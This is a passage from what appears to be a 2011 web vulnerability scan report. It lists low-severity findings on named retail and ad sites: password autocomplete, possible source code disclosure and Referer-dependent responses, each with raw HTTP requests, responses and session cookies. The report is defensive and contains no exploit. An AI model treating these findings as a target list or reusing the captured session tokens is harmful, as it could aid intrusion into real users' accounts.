Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570; __utmz=113636102.1305541077.2.2.utmcsr=petsmart.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=113636102.773639997.1305509971.1305509971.1305541077.2; __utmc=113636102; __utmb=113636102.1.10.1305541077; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542879295%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.petsmart.com/%3Frdir%3D1A_2___1305541079307%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:18:25 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 70411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZon
...[SNIP]...
<tr>
                   
                       <form name="returningCustomer" onsubmit="valLogin();return false;" action="/coreg/index.jsp" method="post">
                       <INPUT TYPE=hidden NAME="token" VALUE=""/>
...[SNIP]...
<br>
                       <input type="password" id="passwd" size="18" name="password" class="pagetext">
                       <br>
...[SNIP]...

14.44. https://www.redcrossstore.org/dp.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.redcrossstore.org
Path:   /dp.aspx

Issue detail

The page contains a form with the following action URL: dp.aspx?pgid=-22&ReturnTo=Cart (the aspnetForm form). The form contains the following password field with autocomplete enabled: Skin$WB_POTIDneg4$txtPassword.

Request

GET /dp.aspx?pgid=-22&ReturnTo=Cart HTTP/1.1
Host: www.redcrossstore.org
Connection: keep-alive
Referer: https://www.redcrossstore.org/Shopper/ContactInfo.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wtlrko45dyq41xzsrrwidz55; InitialEventId=24098163; __utmz=64822188.1305511150.1.1.utmcsr=american.redcross.org|utmccn=(referral)|utmcmd=referral|utmcct=/site/PageServer; AccountType=; Pref=0; __utma=64822188.2001743552.1305511150.1305511150.1305541090.2; __utmc=64822188; __utmb=64822188.3.10.1305541090

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:29:38 GMT
Content-Length: 38918


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html style="margin: 0px">
   <head>
<meta http-equiv="content-type" conten
...[SNIP]...
<body style="margin: 0px">
   
       <form name="aspnetForm" method="post" action="dp.aspx?pgid=-22&amp;ReturnTo=Cart" id="aspnetForm">
<div>
...[SNIP]...
<td><input name="Skin$WB_POTIDneg4$txtPassword" type="password" maxlength="16" id="Skin_WB_POTIDneg4_txtPassword" onkeydown="javascript:Login(event)" style="width:110px;" /></td>
...[SNIP]...

14.45. https://www.restorationhardware.com/my-account/register.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/register.jsp

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /my-account/register.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/forgot-password.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; TS1c138a=27552492896cbb9145e280ea3c546c112efa223a5124b4964dd0fed4; engagement=5; fsr.s={"v":1,"rid":"1305509997099_983249","pv":4,"to":5,"c":"https://www.restorationhardware.com/my-account/forgot-password.jsp","lc":{"d0":{"v":4,"s":true,"e":2}},"cd":0,"sd":0,"f":1305541164254,"cp":{"my-account":"visited"}}; cmRS=&t1=1305541182545&t2=1305541183619&t3=1305541273137&t4=1305541164256&fti=&fn=requestPassword%3A0%3B&ac=&fd=&uer=&fu=&pi=my-account%20forgot-password&ho=cimg-1.restorationhardware.com/cm%3F&ci=90007517

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:32:23 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=c8ca4c79fc3e7bb28d932b5bb1dcf3292efa223a5124b4964dd101e1; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 10:32:23 GMT
Content-Length: 20125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...
</p>
                       <form action="register.jsp?_DARGS=/my-account/register.jsp.my-account-register" method="post"><input value="ISO-8859-1" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
                           <input value="" maxlength="20" type="password" size="20" name="/atg/userprofiling/ProfileFormHandler.value.password" id="password"><input value=" " type="hidden" name="_D:/atg/userprofiling/ProfileFormHandler.value.password">
...[SNIP]...
</label>
                           <input value="" maxlength="20" type="password" size="20" name="/atg/userprofiling/ProfileFormHandler.value.confirmpassword" id="confirmpassword"><input value=" " type="hidden" name="_D:/atg/userprofiling/ProfileFormHandler.value.confirmpassword">
...[SNIP]...

14.46. https://www.restorationhardware.com/my-account/sign-in.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/sign-in.jsp

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /my-account/sign-in.jsp?link=topnav_signin HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: http://www.restorationhardware.com/content/promo.jsp?id=138040&&link=SFGalleryStore
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757}; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511164164

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:09:55 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=ef27e626254569019b6a3249227030c92efa223a5124b4964dd08c1b; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:09:55 GMT
Content-Length: 19152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...
</p>
                           <form action="/my-account/sign-in.jsp?_DARGS=/my-account/sign-in.jsp.my-account-signin" method="post"><input value="ISO-8859-1" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
                                       <input value="" maxlength="20" type="password" size="20" name="/atg/userprofiling/ProfileFormHandler.value.password"><input value=" " type="hidden" name="_D:/atg/userprofiling/ProfileFormHandler.value.password">
...[SNIP]...

15. Source code disclosure
There are 2 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


15.1. http://www.brookstone.com/brookstone.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.brookstone.com
Path:   /brookstone.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /brookstone.js HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CD578D91A4C7B4E1296267339AF6F2A2; TS657dfa=839bad1e649fb9545c4c97dd9c18439ee754034066e5db8e4dd083f960ac0ec57d901b7a

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=259200
Expires: Thu, 19 May 2011 01:04:12 GMT
ETag: W/"141285-1280871734000"
Last-Modified: Tue, 03 Aug 2010 21:42:14 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:04:11 GMT
Age: 192
X-Cache: HIT from cache.brookstone.com
X-Cache-Lookup: HIT from cache.brookstone.com:3128
Connection: close

/********************************************************************************************************************
* UNOBTRUSIVE JAVASCRIPT: (PROTOTYPE)
...[SNIP]...
se{
submitEventBound = false;
// location.reload(true);
}
}
}

/* [Ticket #139714]
#C5ProductDetailEppFDT.jsp <%-- fix for ticket #139714 --%><script type="text/javascript">
...[SNIP]...

15.2. https://www.brookstone.com/brookstone.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.brookstone.com
Path:   /brookstone.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /brookstone.js HTTP/1.1
Host: www.brookstone.com
Connection: keep-alive
Referer: https://www.brookstone.com/formhandlerservlet?currentNodeLink=/shoppingCart.jsp&formName=updateCart_checkout
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543312191%3B; s_sess=%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=259200
Expires: Thu, 19 May 2011 09:53:18 GMT
ETag: W/"141285-1280871734000"
Last-Modified: Tue, 03 Aug 2010 21:42:14 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Date: Mon, 16 May 2011 09:53:18 GMT
Age: 1921
X-Cache: HIT from cache.brookstone.com
X-Cache-Lookup: HIT from cache.brookstone.com:3128
Connection: close

/********************************************************************************************************************
* UNOBTRUSIVE JAVASCRIPT: (PROTOTYPE)
...[SNIP]...
se{
submitEventBound = false;
// location.reload(true);
}
}
}

/* [Ticket #139714]
#C5ProductDetailEppFDT.jsp <%-- fix for ticket #139714 --%><script type="text/javascript">
...[SNIP]...

16. Referer-dependent response
There are 7 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.



16.1. http://action.media6degrees.com/orbserv/hbjs

Summary

Severity:   Information
Confidence:   Firm
Host:   http://action.media6degrees.com
Path:   /orbserv/hbjs

Request 1

GET /orbserv/hbjs?pixId=5204&pcv=30 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDC5BFE2B79833787C45D44D5E9395EC; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=014020a0g0h1ll77mmxzt12dfmxzt12dfmxzt10; clid=2ll77mm01171voofy6a0tk1w02ehk0093r080l08509; orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; rdrlst=4090spbll9m03000000033r030d6hll8nk2000000083r0815ztll9l28000000043r040dlzll9l28000000043r0401hvll8nk2000000083r0816iell9m03000000033r030msvll9m03000000033r0301g3ll8nk2000000083r080e6mll9m03000000033r03; sglst=2050s90ill9m03000430033r030l03503dlell9l28000000043r040l045045msll9l28000000043r040l04504c24ll9l28000000043r040l045041jzll8nk200yk40083r080l08508; vstcnt=418b010r01496o0118e1002

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02f1400a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: orblb=2ll8nk2032gu10u0200z3o00yg11zw10u0100yjk1y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000nn0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z3o0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: JSESSIONID=E5833D4D3BA66471A3D9BEAA6132FFE0; Path=/orbserv
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 77
Date: Mon, 16 May 2011 01:55:01 GMT






(new Image(0,0)).src='http://ad.yieldmanager.com/pixel?t=2&id=1159169';

Request 2

GET /orbserv/hbjs?pixId=5204&pcv=30 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDC5BFE2B79833787C45D44D5E9395EC; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=014020a0g0h1ll77mmxzt12dfmxzt12dfmxzt10; clid=2ll77mm01171voofy6a0tk1w02ehk0093r080l08509; orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; rdrlst=4090spbll9m03000000033r030d6hll8nk2000000083r0815ztll9l28000000043r040dlzll9l28000000043r0401hvll8nk2000000083r0816iell9m03000000033r030msvll9m03000000033r0301g3ll8nk2000000083r080e6mll9m03000000033r03; sglst=2050s90ill9m03000430033r030l03503dlell9l28000000043r040l045045msll9l28000000043r040l04504c24ll9l28000000043r040l045041jzll8nk200yk40083r080l08508; vstcnt=418b010r01496o0118e1002

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02f1y00a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:32 GMT; Path=/
Set-Cookie: orblb=2ll8nk2032gu10u0200z4i00yg11zw10u0100yjk1y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:32 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:32 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000oh0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z4i0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:32 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:32 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 77
Date: Mon, 16 May 2011 01:55:32 GMT






(new Image(0,0)).src='http://ad.yieldmanager.com/pixel?t=2&id=1159169';

16.2. http://ads.adbrite.com/adserver/vdi/684339

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Request 1

GET /adserver/vdi/684339?d=110 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; srh="1%3Aq64FAA%3D%3D"; rb2=ChMKBjY4NDMzORi1nd_6EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; rb=0:684339:20838240:110:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlCAfhpzZWjsxiurlJxDuGWHJXSIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; vsd=0@2@4dd08156@www.imiclk.com

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 16 May 2011 01:55:15 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChMKBjY4NDMzORipgJT7EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 01:55:15 GMT
Set-Cookie: ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlBwDuGWlaGxS6isUoJ%2BGnOHjXeIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 13-May-2021 01:55:15 GMT
Set-Cookie: vsd=0@1@4dd08403@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Wed, 18-May-2011 01:55:15 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/vdi/684339?d=110 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; srh="1%3Aq64FAA%3D%3D"; rb2=ChMKBjY4NDMzORi1nd_6EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; rb=0:684339:20838240:110:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlCAfhpzZWjsxiurlJxDuGWHJXSIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; vsd=0@2@4dd08156@www.imiclk.com

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 16 May 2011 01:55:46 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChMKBjY4NDMzORjb9JX7EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 01:55:46 GMT
Set-Cookie: ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlBwDuGWlaGxS6isUoJ%2BGnOHjXeIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 13-May-2021 01:55:46 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Mon, 16-May-2011 01:55:46 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

16.3. https://secure.bluenile.com/accounts/account-sign-in.html

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.bluenile.com
Path:   /accounts/account-sign-in.html

Request 1

GET /accounts/account-sign-in.html HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; stc=3NZR3Q; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false; pop=sweeps~1

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=C4A385CE7874D0A2B551FC74E3744D04; Path=/; Secure
Set-Cookie: bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:06:40 GMT; Path=/
Set-Cookie: SID=""; Domain=.bluenile.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; Domain=.bluenile.com; Expires=Tue, 15-May-2012 02:06:40 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 63219





<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Your Account Sign In - Blue Nile</title>

<link rel="stylesheet" type="text/css" media="screen, print" href="/N518116487/bundles/allpages.css" />
<link rel="stylesheet" type="text/css" media="screen, print" href="/N1374326862/bundles/cart.css" />
<link rel="stylesheet" type="text/css" media="print" href="/N688855944/css/cart_print.css" />
<link rel="stylesheet" type="text/css" media="screen, print" href="/984568475/css/footer.css" />

<script type="text/javascript" src="/926308692/bundles/core.js" ></script>
<script type="text/javascript" src="/N3371804/bundles/allpages.js" ></script>
<script type="text/javascript" src="/N522719515/bundles/ga.js" ></script>
<script type="text/javascript" src="/N889218490/bundles/forms.js" ></script>
